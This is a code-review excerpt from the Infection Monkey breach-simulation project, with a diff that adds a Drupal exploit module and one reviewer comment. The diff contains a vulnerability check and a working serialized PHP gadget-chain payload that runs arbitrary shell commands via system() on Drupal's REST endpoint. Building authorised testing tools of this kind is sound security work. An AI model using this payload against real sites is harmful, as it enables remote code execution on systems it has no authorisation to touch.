monkey/infection_monkey/exploit/drupal.py

```diff
@@ -0,0 +1,175 @@
+                if self.check_if_exploitable(node_url):
+                    self.add_vuln_url(url)  # Where is this used?
+                    self.vulnerable_urls.append(node_url)
+                    if stop_checking:
+                        break
+        if not self.vulnerable_urls:
+            LOG.info("No vulnerable urls found")
+
+    def check_if_exploitable(self, url):
+        """
+        Check if a certain URL is exploitable.
+        We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
+        a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
+        :param url: Drupal's URL and port
+        :return: Vulnerable URL if exploitable, otherwise False
+        """
+        payload = {
+            "_links": {
+                "type": {
+                    "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
+                }
+            },
+            "type": {
+                "target_id": "article"
+            },
+            "title": {
+                "value": "My Article"
+            },
+            "body": {
+                "value": ""
+            }
+        }
+    
+        response = requests.get(f'{url}?_format=hal_json',
+                                json=payload,
+                                headers={"Content-Type": "application/hal+json"})
+    
+        if check_drupal_cache(response):
+            LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
+            return False
+    
+        return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
+
+    def exploit(self, url, command):
+        # pad a easy search replace output:
+        cmd = 'echo ---- && ' + command
+        base = remove_port(url)
+        payload = {
+            "link": [
+                {
+                    "value": "link",
+                    "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000"
+                               "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\""
+                               "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:"
+                               "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
+                               "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000"
+                               "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000"
+                               "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\""
+                               "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
+                               "".replace('|size|', str(len(cmd))).replace('|command|', cmd)
+                }
+            ],
+            "_links": {
+                "type": {
+                    "href": f"{urljoin(base, '/rest/type/shortcut/default')}"
+                }
+            }
```

Comment:
Same as previous comment, try to export this payload somewhere else.

Reply:
cf776063